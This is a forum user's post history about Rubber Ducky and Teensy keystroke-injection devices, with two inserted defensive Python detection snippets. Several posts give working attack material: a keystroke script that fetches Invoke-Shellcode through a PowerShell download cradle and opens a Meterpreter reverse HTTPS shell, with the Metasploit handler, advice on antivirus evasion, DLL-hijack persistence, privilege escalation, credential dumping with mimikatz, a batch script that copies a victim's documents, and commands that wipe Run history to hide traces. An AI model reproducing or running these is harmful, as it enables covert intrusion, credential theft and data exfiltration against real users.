Xcellerator

Everything posted by Xcellerator

  1. You can't run a 64-bit executable on a 32-bit machine, but you can do it the other way. (x86 Meterpreter works on x86 and x64 architectures, but the x86 detection rate is A LOT higher than 64-bit.) The x86 Meterpreter reverse_https is here: payload/windows/meterpreter/reverse_https (the one I expect you used). The x64 one is here: payload/windows/x64/meterpreter/reverse_https. Also, try and use msfvenom for generating payloads; it's a combination of msfpayload and msfencode.
  2. Well, to start, tunnelling anything over SSL is a great start. Have a look into Meterpreter in Metasploit. The 64-bit HTTPS Meterpreter, even as a binary, will pretty much never be detected by an AV. As far as persistence goes, the startup folder is one way, but is usually picked up by AV. Or put Meterpreter into a DLL file, call it "fxsst.dll" and throw it into C:\Windows. Windows automatically tries to load this DLL on startup as part of the "Windows Picture and Fax" service.
  3. Hey guys, I've been playing around with PowerShell and also been looking into PowerSploit (I really suggest you look into PowerSploit - it's got some amazing stuff in it!). Anyway, I came across this: http://www.pentestgeek.com/2013/09/18/invoke-shellcode/, and I thought it would work great as a Ducky script! First, here is the actual Duckyscript code you need to run on the target machine, ONLY AFTER setting up the listener in Metasploit below.
     DELAY 5000
     GUI r
     DELAY 500
     STRING cmd
     ENTER
     STRING cd %TEMP%
     ENTER
     STRING copy con met.cmd
     ENTER
     STRING start C:/Windows/System32/Ribbons.scr /s
     ENTER
     STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <IP_ADDRESS> -Lport <PORT> -Force"
     ENTER
     CTRL z
     ENTER
     DELAY 100
     STRING met.cmd && exit
     ENTER
     Just make sure you remember to change <IP_ADDRESS> to your actual IP address and <PORT> to the port you want to run the session over. Now, in a terminal window in a Linux distro (make sure you have Metasploit installed), make a file with this as its contents, obviously changing the values in < and > to match your settings:
     use exploit/multi/handler
     set payload windows/meterpreter/reverse_https
     set LHOST <IP_ADDRESS>
     set LPORT <PORT>
     exploit -j -z
     Name it whatever you want with a .rc extension. ### MAKE SURE YOU DO THIS BEFORE YOU EXECUTE THE PAYLOAD ON THE MACHINE! IT IS A REVERSE SHELL, NOT A BIND SHELL ### Run this in the terminal:
     msfconsole -r ./fileyoujustmade.rc
     Let everything start up and ensure there are no errors. (You might get an error with a port already being in use on your machine, or permissions problems if you try and use port 443 on Debian systems without being root.) Now, run the payload from the Ducky on the target machine. Once you see the screensaver appear, you're good to remove the Ducky.
     It may take up to 10 seconds for you to receive your shell as it has to connect out to the internet to load the Invoke-Shellcode plugin and then actually generate and load the Meterpreter into memory. Issues that occurred: I found that my Metasploit just sat at "Meterpreter shell 1 opened at....". This could be because it attempts to automatically run the smart_migrate module upon connection. All I did to resolve this was to hit enter to get the msf prompt back, and then connect into the Meterpreter session and run smart_migrate automatically. Smart_migrate can be found at post/windows/manage/smart_migrate in the Metasploit trunk. Although, be warned - smart_migrate automatically attempts to migrate into explorer.exe which ##DOES NOT## have administrative privileges. So, you'll have to utilise the post modules to grant yourself admin and eventually even SYSTEM (if you want to dump Firefox/Chrome/IE passwords, hashes or use mimikatz or WCE to get the wDigest passwords from memory). I'd recommend the bypass_uac or ask modules to grab yourself admin - particularly ask in lower security environments. For the Forensics Conscious: If you're concerned about remaining undetected on the machine you've got the shell on, then I recommend the following steps:
     1. Delete met.cmd from %TEMP% - you don't want it to come back to bite you on the ass once you're done with the machine.
     2. Kill the powershell.exe process once you've migrated out of it.
     Hope you all enjoy! I know many of you will find good use of this, and as always - use responsibly! ;-P
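As an added defensive example (my own, not part of Xcellerator's post), a small Python triage routine that flags process command lines showing the pattern described in the post above: the PowerShell download cradle, Invoke-Shellcode with a Meterpreter payload, the copy-con stager and the screensaver launch used as cover. The indicator names and patterns are my own, and the sample command lines are constructed to resemble what a 4688 or Sysmon process-creation event would carry.

```python
import re

# Indicator patterns for the technique in the post above: a PowerShell download
# cradle that fetches Invoke-Shellcode and stages Meterpreter in memory, the
# 'copy con' stager written to %TEMP%, and a screensaver started as cover.
# Indicator names and patterns are my own (constructed for this example).
INDICATORS = {
    "download_cradle": re.compile(
        r"new-object\s+(system\.)?net\.webclient.*?\.downloadstring\s*\(", re.I),
    "invoke_expression": re.compile(
        r"(?<![\w-])(iex|invoke-expression)(?![\w-])", re.I),
    "invoke_shellcode": re.compile(r"invoke-shellcode", re.I),
    "meterpreter_payload": re.compile(
        r"windows/(x64/)?meterpreter/reverse_https?", re.I),
    "screensaver_cover": re.compile(r"\.scr\s+[/-]s(\s|$)", re.I),
    "copy_con_stager": re.compile(r"\bcopy\s+con\s+\S+\.(cmd|bat)\b", re.I),
}

# Constructed process command lines (what a 4688 / Sysmon event 1 would carry).
SAMPLE_COMMAND_LINES = [
    'powershell "IEX (New-Object Net.WebClient).DownloadString(\'http://bit.ly/14bZZ0c\'); '
    'Invoke-Shellcode -Payload windows/meterpreter/reverse_https '
    '-Lhost <IP_ADDRESS> -Lport <PORT> -Force"',
    "start C:/Windows/System32/Ribbons.scr /s",
    "cmd /c copy con met.cmd",
    "powershell Get-ChildItem C:\\Users",
]


def match_indicators(command_line):
    """Return the sorted names of every indicator found in one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(command_line))


def triage(command_lines, min_hits=2):
    """Map each command line to its hits, keeping only lines with >= min_hits.

    Requiring two independent indicators (cradle plus Invoke-Shellcode, say)
    stops a lone 'iex' in an admin script from raising an alert on its own.
    """
    report = {}
    for line in command_lines:
        hits = match_indicators(line)
        if len(hits) >= min_hits:
            report[line] = hits
    return report


if __name__ == "__main__":
    for line, hits in triage(SAMPLE_COMMAND_LINES, min_hits=1).items():
        print(", ".join(hits), "<-", line)
```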
  4. It's as you said, replicating the content of the shortcut file. I imagine it would shave off a second or two doing it that way, rather than going through the Windows GUI.
  5. This is great, but it would be wise to keep in mind that this is a very LOUD form of persistence. If you're running this on a network, then you need to be aware of any network admins that may be watching outgoing connections or just block all inbound RDP connections at the firewall level.
  6. This can be done, except it's easier (and better) to encode the exe in Base-64, type out a VBS file to decode the Base-64, and then run it. In theory, I see no reason why a PS/2 adapter wouldn't work, the only problem being that PS/2 requires a reboot to work, so you'd need to log in again anyway - and lengthy periods of time (like rebooting) are what the ducky is trying to avoid.
  7. The Rubber Ducky is just a programmable keyboard device. Anything that you can't do with a keyboard, you can't do with a Rubber Ducky. So, in order to use the Utility Manager payload, you need to be at a desktop - not a lock screen or a logon prompt.
  8. I did the same thing as this payload except with utilman.exe (Utility Manager) instead of sethc.exe. I believe osk.exe (On-Screen Keyboard) is also run as SYSTEM on any Windows machine, so would also work.
  9. I'm working with a Teensy++ 2.0 board which only has 128K of onboard flash memory. I'm using it as HID + Disk, so as well as the program that contains the keystrokes, I also have it doubled up as mass storage. The files I need on the disk ever so slightly exceed the limit. I literally need to lose a couple of K. Is there a way of stripping out the unnecessary data from the files? Like all the NTFS permissions that Windows uses (I'm in Mint now - no longer Windows), and other data? Thanks in advance for any advice.
  10. Well, the Ducky firmware is specific to the hardware that makes the duck a duck, and all Teensy boards have a separate boot loader that you aren't advised to overwrite unless you know exactly what you're doing. You can write out code in C++ like I do with my Teensy++ 2.0, using the Arduino IDE. This is what happened in the old days before the Ducky was being manufactured: everyone used Teensys and wrote the code manually and flashed it. You can use the SD card adapter as mass storage along with HID keyboard functionality, so for exfiltration you're set. Without it you only have ~128K of flash memory and usually have to resort to FTPs (at least that's my solution!)
  11. Or you can try a tool called Mpress. I use a Teensy board which only has 128K of memory. Using Mpress I got mimikatz down from 134K to 61K. Still runs perfectly, I've encountered no execution issues whatsoever. Works with Win32+ binaries as well, so you get 64-Bit support too.
  12. That's great, the /S flag makes it recursive (similar to -R in *nix), and the double quotes encapsulate the whole string rather than breaking at the space. Thanks for sharing!
  13. Sorry, I should have been clearer. By default, Windows hides the extension on files that it recognises. That means that the test.txt file in your documents is actually test.txt.txt. (It adds the .txt automatically.) So rename the file in your documents so that it just says "test", rather than "test.txt". Xcopy shouldn't need any more parameters than that, so try this in a command prompt:
      xcopy %USERPROFILE%\Documents\test.txt %USERPROFILE%\Desktop\
      which SHOULD copy test.txt to your desktop.
  14. Well, only in that it's a similar case of reverse engineering a USB device.
  15. Add a 100/200 ms delay after typing exit before hitting enter. I had this problem once; I fixed it by adding very short delays (eventually I worked out I only need 50 ms ones).
      STRING exit
      DELAY 100
      ENTER
  16. Look into something called "PSGroove" and "PSFreedom". A few years ago, when the first jailbreak for the PS3 was released, a guy called "Mathieulh" reverse engineered the USB device that did it and released a version that you could flash to pretty much anything ("PSGroove") and a version for iBoot on Apple devices ("PSFreedom"). At the time, I remember he published how he reverse engineered it (and I think the BBC did an article on him as well). Don't know if this will let you re-program the device you've got, but it may let you reverse engineer it to see how similar it is to the Ducky.
  17. The unrecognised java command in the prompt can be fixed by adding the Java binary install directory to the %PATH% variable. This can be done in System Properties from My Computer.
  18. Just alter your ducky script to type out the password for the administrative user and then hit enter instead of moving to "yes" or the Alt-Y combo. Should work fine.
  19. You can delete the entire history from the Run dialog using
      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
      or, you can specify what exact command you want removed with this:
      rem Batch-file form (%%A); at an interactive prompt use %A instead.
      rem /C: makes findstr match the whole phrase rather than any one word in it.
      for /f "tokens=1 delims= " %%A in ('reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ^| findstr /C:"powershell Start-Process cmd.exe -Verb RunAs"') do (reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /v %%A /f)
      or change "powershell Start-Process cmd.exe -Verb RunAs" to anything you like.
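As an added forensic example (my own, not from the post), a Python parser that rebuilds the Run dialog history from 'reg query' output of the RunMRU key discussed above, and models what the selective 'reg delete /v' leaves behind. The sample output is constructed; the slot layout (lettered values ending in "\1", ordered by an MRUList string) is how Explorer stores this key.

```python
import re

# Constructed 'reg query' output for the RunMRU key discussed above.  Explorer
# stores each Run dialog entry in a lettered slot with a trailing "\1" and keeps
# the most-recent-first order in the MRUList value.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    cmd\1
    b    REG_SZ    powershell Start-Process cmd.exe -Verb RunAs\1
    c    REG_SZ    notepad\1
    MRUList    REG_SZ    bca
"""

VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")


def parse_reg_query(text):
    """Return {value_name: data} for the value lines of one 'reg query' key."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            name, _reg_type, data = m.groups()
            values[name] = data.rstrip()
    return values


def run_history(values):
    """Rebuild the Run dialog history, most recent first, as (slot, command).

    A slot named in MRUList but absent from the key maps to None.  That is
    exactly what 'reg delete ... /v <slot> /f' leaves: the value is gone but
    MRUList still references it, which is itself a sign of tampering.
    """
    history = []
    for slot in values.get("MRUList", ""):
        data = values.get(slot)
        if data is not None and data.endswith("\\1"):
            data = data[:-2]
        history.append((slot, data))
    return history


def delete_slot(values, slot):
    """Model the post's selective 'reg delete /v <slot>': only that value goes."""
    remaining = dict(values)
    remaining.pop(slot, None)
    return remaining


if __name__ == "__main__":
    vals = parse_reg_query(SAMPLE_REG_QUERY)
    print(run_history(vals))
    print(run_history(delete_slot(vals, "b")))
```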
  20. Make a new DuckSlurp.bat file and paste this into it:
      @echo off
      set destination=%~d0\DuckSlurp\%COMPUTERNAME%
      mkdir "%destination%"
      if exist "%USERPROFILE%\Documents" (
          xcopy "%USERPROFILE%\Documents\test.txt" "%destination%" >>nul
      )
      @cls
      taskkill /f /IM cmd.exe
      @exit
      Make a text file in your documents called "test.txt". It seems that the DuckyWait.bat script is running fine as it's actually calling the right file on the USB, so just run this script (the one above) normally (not with the Ducky). This is the actual script from my personal setup, so I can confirm it works fine. If this works, then just change the line
      xcopy "%USERPROFILE%\Documents\test.txt" "%destination%" >>nul
      to
      xcopy "%USERPROFILE%\Documents\*" "%destination%" >>nul
      and it should copy over everything in documents. (The *, also called a 'wildcard', means everything in the directory.)
  21. Or just issue "start C:\Windows\System32\Ribbons.scr -s" at the start of the DuckSlurp.bat file on the USB. The screensaver will activate and the rest of the batch file will run behind it!
  22. iPhones will not work with any HID device because they are not supported at all (you cannot even buy Apple ones for them!). iPads do work, as long as you have a half-decent adapter. There have been people saying that cheaper knock-off ones don't work very well. I don't have an iPad Mini, so cannot say - but I'd be interested to hear if anyone does have one. The full documentation for keyboard shortcuts on iOS is here: https://developer.apple.com/library/ios/documentation/IDEs/Conceptual/xcode_help-command_shortcuts/Introduction/Introduction.html#//apple_ref/doc/uid/TP40010560 In case you aren't sure:
      Command Key == Windows Key (GUI key)
      Option Key == Alt Key
  23. I don't have a ducky because I already had a Teensy++ 2.0 from before. If you don't mind writing all your scripts in C, then you're fine. The selling point is very much the fact that it is so simple to script for. Writing out longer scripts in C takes ages.. -.-
  24. Wow, glad to see the progress this payload has made! Quick execution of this (particularly on stuff like personal laptops with only one user) is a fast track to owning the first box on the network! Would be great to include some form of encryption before FTPing the files over, though! Perhaps hosting a truecrypt binary on the FTP server, downloading it first to encrypt, then upload the TC file? Just an idea, but I'll look into it..!